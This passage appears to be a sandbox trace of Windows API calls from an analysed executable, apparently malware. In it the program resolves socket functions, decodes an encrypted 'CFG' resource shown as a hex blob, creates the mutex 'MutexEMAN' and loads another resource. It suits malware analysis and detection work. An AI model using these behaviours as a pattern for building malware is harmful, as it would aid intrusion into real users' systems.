lpMultiByteStr=0x1fc82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0073.835] GetProcAddress (hModule=0x75130000, lpProcName="WakeConditionVariable") returned 0x779f5860 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x1fcf45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0073.835] GetProcAddress (hModule=0x75130000, lpProcName="WakeAllConditionVariable") returned 0x779f3370 [0073.836] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0073.836] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x1fcf45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0073.836] GetProcAddress (hModule=0x75130000, lpProcName="SleepConditionVariableCS") returned 0x74e62850 [0073.836] GetThreadLocale () returned 0x409 [0073.836] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0073.836] GetCurrentThreadId () returned 0x360 [0073.836] GetCurrentThreadId () returned 0x360 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x19f780, cchData=256 | out: lpLCData="2") returned 2 [0073.836] GetThreadLocale () returned 0x409 [0073.836] EnumCalendarInfoW (lpCalInfoEnumProc=0x4205a0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0073.836] GetThreadLocale () returned 0x409 [0073.836] EnumCalendarInfoW (lpCalInfoEnumProc=0x420644, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0073.836] GetCurrentThreadId () returned 0x360 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Sun") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Sunday") returned 7 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Mon") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Monday") returned 7 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Tue") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Tuesday") returned 8 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Wed") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Wednesday") returned 10 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Thu") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Thursday") returned 9 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Fri") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Friday") returned 7 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Sat") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Saturday") returned 9 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x19f780, cchData=256 | out: lpLCData="Jan") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x19f780, cchData=256 | out: lpLCData="January") returned 8 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x19f780, cchData=256 | out: lpLCData="Feb") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x19f780, cchData=256 | out: lpLCData="February") returned 9 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x19f780, cchData=256 | out: lpLCData="Mar") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x19f780, cchData=256 | out: lpLCData="March") returned 6 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x19f780, cchData=256 | out: lpLCData="Apr") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x19f780, cchData=256 | out: lpLCData="April") returned 6 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x19f780, cchData=256 | out: lpLCData="May") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x19f780, cchData=256 | out: lpLCData="May") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x19f780, cchData=256 | out: lpLCData="Jun") returned 4 [0073.836] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x19f780, cchData=256 | out: lpLCData="June") returned 5 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x19f780, cchData=256 | out: lpLCData="Jul") returned 4 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x19f780, cchData=256 | out: lpLCData="July") returned 5 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x19f780, cchData=256 | out: lpLCData="Aug") returned 4 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x19f780, cchData=256 | out: lpLCData="August") returned 7 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x19f780, cchData=256 | out: lpLCData="Sep") returned 4 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x19f780, cchData=256 | out: lpLCData="September") returned 10 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x19f780, cchData=256 | out: lpLCData="Oct") returned 4 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x19f780, cchData=256 | out: lpLCData="October") returned 8 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x19f780, cchData=256 | out: lpLCData="Nov") returned 4 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x19f780, cchData=256 | out: lpLCData="November") returned 9 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x19f780, cchData=256 | out: lpLCData="Dec") returned 4 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x19f780, cchData=256 | out: lpLCData="December") returned 9 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="$") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=",") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=".") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="2") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x19f9c8, cchData=2 | out: lpLCData="/") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x19f788, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f788, cchData=256 | out: lpLCData="1") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x19f788, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f788, cchData=256 | out: lpLCData="1") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=":") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="AM") returned 3 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="PM") returned 3 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0073.837] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=",") returned 2 [0073.837] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x76ed0000 [0073.837] GetProcAddress (hModule=0x76ed0000, lpProcName="WSAIoctl") returned 0x76eddca0 [0073.837] GetProcAddress (hModule=0x76ed0000, lpProcName="__WSAFDIsSet") returned 0x76ee2f20 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="closesocket") returned 0x76ed9ba0 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="ioctlsocket") returned 0x76edd860 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="WSAGetLastError") returned 0x76ee38d0 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="WSAStartup") returned 0x76ee2420 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="WSACleanup") returned 0x76edda00 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="accept") returned 0x76ee4030 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="bind") returned 0x76ede0f0 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="connect") returned 0x76ee33a0 [0073.838] GetProcAddress (hModule=0x76ed0000, lpProcName="getpeername") returned 0x76ee12c0 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="getsockname") returned 0x76ede030 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="getsockopt") returned 0x76ee1180 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="htonl") returned 0x76ee3670 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="htons") returned 0x76ee3650 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="inet_addr") returned 0x76ee2e90 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="inet_ntoa") returned 0x76ee4b00 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="listen") returned 0x76ee3f40 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="ntohl") returned 0x76ee3670 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="ntohs") returned 0x76ee3650 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="recv") returned 0x76edcff0 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="recvfrom") returned 0x76ee4d60 [0073.839] GetProcAddress (hModule=0x76ed0000, lpProcName="select") returned 0x76ee48e0 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="send") returned 0x76edce20 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="sendto") returned 0x76ee15a0 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="setsockopt") returned 0x76ed9560 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="shutdown") returned 0x76ee14e0 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="socket") returned 0x76ed9780 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="gethostbyaddr") returned 0x76efc600 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="gethostbyname") returned 0x76efc790 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="getprotobyname") returned 0x76efb6d0 [0073.840] GetProcAddress (hModule=0x76ed0000, lpProcName="getprotobynumber") returned 0x76efb820 [0073.841] GetProcAddress (hModule=0x76ed0000, lpProcName="getservbyname") returned 0x76efcad0 [0073.841] GetProcAddress (hModule=0x76ed0000, lpProcName="getservbyport") returned 0x76efccb0 [0073.841] GetProcAddress (hModule=0x76ed0000, lpProcName="gethostname") returned 0x76efc920 [0073.841] GetProcAddress (hModule=0x76ed0000, lpProcName="getaddrinfo") returned 0x76ed52b0 [0073.841] GetProcAddress (hModule=0x76ed0000, lpProcName="freeaddrinfo") returned 0x76ed4b00 [0073.841] GetProcAddress (hModule=0x76ed0000, lpProcName="getnameinfo") returned 0x76ee16a0 [0073.841] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4edec0 | out: lpWSAData=0x4edec0) returned 0 [0073.846] GetACP () returned 0x4e4 [0073.846] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fbd8 | out: lpCPInfo=0x19fbd8) returned 1 [0073.847] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x4f5410 [0073.847] LoadResource (hModule=0x400000, hResInfo=0x4f5410) returned 0x4f7718 [0073.847] SizeofResource (hModule=0x400000, hResInfo=0x4f5410) returned 0x1202 [0073.847] LockResource (hResData=0x4f7718) returned 0x4f7718 [0073.847] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x19fb04 | out: lpCPInfo=0x19fb04) returned 1 [0073.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fab358, cbMultiByte=4610, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4610 [0073.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fab358, cbMultiByte=4610, lpWideCharStr=0x1fac58c, cchWideChar=4610 | out: lpWideCharStr="38\r\n85CF6029950979882BBF06141B7D65D617B3CAAE045D8F9DF7ABC6AC91AD1597\r\n6B36ADB806D299307C3B694524B3511594B35DC46C548DE50B60746829A09B44\r\nA93FE5A114A457F0E7BB3C353DEFBCBE7620B5C78D008C38ADB62C1F157A9F91\r\n008065B60C2C14DCDFE2C42155B0AB06417BD6B9324A19C1559F7337D100B27E\r\n52BE7B9068A92E295685ED35815218346B44C469212A23350F39E2755EF811B2\r\nB827E874AB04ED767565C6601F90344ACF70A4FE43C702199AFEAD9404CF449D\r\n2C410DE89F6DA5F8FA4DFADB5157FDBCF460A8C9668553BF76491B064568520F\r\n913AC59277EF13FAA98EE14C0BE54D59AA3F7AC9F4ABCAE433A1C493DF12A6D0\r\n60C42CC1CC626AB1DD9DA7B36B302F4C94588475E8F56DE2ADC721991DE4123B\r\nE02B85EEB6F03E4256B973DD5C43CF03144CF3E6C9376E5E322931AE7C83C719\r\nFB528C4AFB55169E172E2E51FCC2B4504A9078BCEC56156DD9B3A987A2153A61\r\nC7382E34A4E0D319B5DBDB3ED628B5E2B34C1588B02519B17D9CE253EF3278E3\r\nB73EC8EA541A10C5B330F39F12C46BB072F3560666F0F0ABE00BBA9CD4BA3749\r\n794D19E85B3EB0A586FDB515C311A5769BC14F049ED74EEC76C18A14BB931BF5\r\nB14D73ED50EF9DCBEC8B3D0B3F15354518140F201A6D874296A7E1107010729C\r\n51A6894B26B68E6A1688CA3EBDD6FE2A568C924608D7A254988BF47B51F00DEE\r\n7174ADAFBFE6EE4E88A3EC1633391C9B8550E83AC12F97BA554B1A727742B68B\r\n58DD73C175614F39E360E8235307825540CE63B1D5F8208275E59A6EC3C9CFD7\r\n06D80BCA0AC8584287E0F2436C9FE19823706A0C0D1F50EAD391B2B6A7B13963\r\nBC9FB7721D55A24738D877710496EEDBFD65F023CFE2AB4B5B4DB180DFE7C875\r\n45D8139DDDE81D65F5D20AA3F2845607AD828B8DF9AB9427D1628DAE22A0A457\r\n5A2FFCE2BCF80105590D1A560BA58CA65B78392228CCD6AC9D1A296FAC704739\r\nB5BDD8D1F0F4464DA6C4571B1458AD3C6257DA433B8A04FD5C83AEB4B1A3EBF6\r\n386E050D22E37BED0402B7DFB917286E37659F8398374066C93FECC849F048E5\r\n44988B6EBB21AAC64EB97EC78A49F1F04DB13F3EF25D4D534D18CF67D7A18E91\r\nB49C7AB116CDE0C89C3A8BF462E7BB8CBE0F25175A2BCDF6D059199388CC246E\r\n2961D4B3FEE0893C7B93B8DA799579DC78B12D064622AE0F8FF82F81BCAB3B1A\r\n210461520ABE732605054E70A0C30517849F08DC56E842CC602B4706F8F100D5\r\nF69E1A56448F7C83E97AA2FD6834F0DDEEB70406257B0D38888A07EB2AC631C3\r\n95AA5724D6944A7F2EDD236CADE1027898A07B571CD3FB88C8372D21D86827DB\r\nE888CA7811AFEB7760BCA58DFC48219A67659B762436162593F42375C2FF0C17\r\n94BDD488E7182D2FA246EB5B0EC93AD1AFEA807305B942BE9079F42E146D3D42\r\n97D887369E40483F32000D9D59AC2991B9D8874625633CDC1AFDD769920AF16A\r\nC0C98F577A41F8A5411FACBBEA5C7BA8AEA64B3932687F91726EFE2FAA06DE79\r\n9AA78B095BF41A9427E79B53084D30EA6E8ADB18BD575F089E5F2CF5EC73F0CB\r\nA4A356E65347BE153709C8F75ECD36A66246A4BD10A22D6D550B349AE89163B8\r\n220D36E5B7F88D66BFAE6EB7B627E2A000FDDE6D80679E9E108776BFB817739D\r\n288640784EC30F4CCEC9351E959DEDF2423DC9545A40296DD71171D69EE828B2\r\n22\r\n230B7E\r\n879028ED80A28B2FB1\r\n321F3ED4720936818DA4CA2A0C305B230F7F6C4F82B9DE5B1A6E41D3838C7CEE7B8B8229BD8ADE3DAAFDBE74BD22F1369E93C215410D338FCBC35609524CF774722B02C64F2D0D9FE9473CE0046B0B0B4DF2A3ECF569E4F0E7C2FAE5397B83FB7530D6E4CD9610A8B78A16775EF308E653BE702ADDEB\r\n090ACA7F1B6F712D3D68F310AF61282C20EF203FB3825DA9656C3F76402FCB712786A457673A6A630E212CB33E1C36DD240243CADCCB76CA68B8DD369B9D7A24721A6E8381FB026630D89406C1395DEBCF0BFEC63626485680B39528EDB244BD9D514A2F7B52954CF113E51D8B85903D93F1B406C5312158FEB5B0CBFA4D5806288A7113A7B375677571165558E45454\r\nE3F47FB4\r\nF6C0254AA93EAA79\r\nB3378708CDF4E7E1CD275A0B\r\nF7\r\n4E303937E934E47A6FA207D3B9283B42\r\nB85D9AFD0838B7F48813EB9FAD2B3AEEB286493D81312261\r\nA7921E40B7541B8C3C5A265EF7FE6AE5D54D9372C701\r\nE3DDBB4991D700C7E6968569ED3BF4A442C67B889397D4DA6BB02EC3480405D44BAF13CCC2\r\nEEB8B4203BAB556EA4DDA72EF62BB130D3\r\n08\r\n4B94\r\n58\r\n5CA297A0551FF278F61316153C7EF498A6863B9F4E82D6C2267C079149FC28497BAED682256D8E0BD67C80DF51FE66EE030303EB940E79AF299B98441BC408CAFAE0E6BB645360F533604A292FACAD452A70F7DF07A7F294047795DA59FB425621C3D6BDDCBA65FA2A5AF01C5EA0FD4C91847FA53764340327A75FCE14284025FD0F6B020EBB33F9DF9A2ABD5EF40DAE974B71B7BBA1364D38565A129E78C3419662ACF41FCA6319640979DD19A83C8F5E7AB3A2F8B9AA37228F404697D2B065CDC2BC26509AA4150605130749C83337D6D63598ECA253BB08AECDB480A23851CBC6A606\r\n100BE2C574C66D3DD43B37D8A138F9331960C35077DA93FA89DC75E2E541F5812C2863E52A953BF7D5FF\r\nF6\r\n95\r\nA47A37EBB4C6DA034CCCF7793856350A632BFBC5524AABAFA11340\r\nF4896D959F65DD8982609066C1165561FF0D0A02BE632DC2CF39E7C8526171\r\n12569EC2BE07673F4E716116A0E3C70A8347\r\nBABB85CE03699CF9BD27CF9AF03F9A8275A7791DCACF0716B81500B0CBC0\r\nA21D084B88BE4468A5D5654299\r\nDCA98FA22FD1EAE60A1BFA579095\r\n0D5DCD0EC00B75F72750FD58A4\r\n71E1463676ADC4DEDA4CBD17F70319292F2BE46BFEEF8DF9BCC3F1C349BACA0DF5C5462C7976E02CADE5D216A1112A76BD5727C4CBE23A4F2A70AA31234695C9B1F7CFF7AC1076A229CFEBA1CE69905B9906024C2D4B59B99825613559C6DD8368D9E8FF43EAA5C91A991D430BF8FA4B3AA93742177A386E88D7A353081A39854EFA\r\n82F14DBD09514D7549E3AB\r\nD54389191F0A3E2229092CD1B2B480422A51E0B3A4A07504BF4D\r\n7B215CFB2A04B1DAF051A043\r\n") returned 4610 [0073.848] FreeResource (hResData=0x4f7718) returned 0 [0073.849] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb9eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜P\x19") returned 1 [0073.849] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb9eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜L\x19") returned 1 [0073.849] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb9eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜H\x19") returned 1 [0073.849] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb9eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜D\x19") returned 1 [0073.849] GetTickCount () returned 0x1d9b1 [0073.849] QueryPerformanceCounter (in: lpPerformanceCount=0x19fbe8 | out: lpPerformanceCount=0x19fbe8*=12131205645) returned 1 [0073.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x31\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x39\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x6b\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x53\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x76\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x4c\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x6f\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x51\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x73\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x61\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x43\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x6c\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x44\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x4e\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x37\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x79\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0073.850] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0073.850] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb2aec, cbMultiByte=9, lpWideCharStr=0x19eb3c, cchWideChar=2047 | out: lpWideCharStr="MutexEMAN\x19沞蒼\x19쐈@Ӥ") returned 9 [0073.850] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="MutexEMAN") returned 0x0 [0073.850] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="MutexEMAN") returned 0x1fc [0073.850] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0073.851] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0073.851] FindResourceW (hModule=0x400000, lpName="LCWL", lpType=0xa) returned 0x4f5460 [0073.851] LoadResource (hModule=0x400000, hResInfo=0x4f5460) returned 0x525ebc [0073.851] SizeofResource (hModule=0x400000, hResInfo=0x4f5460) returned 0x60 [0073.851] LockResource (hResData=0x525ebc) returned 0x525ebc [0073.851] FreeResource (hResData=0x525ebc) returned 0 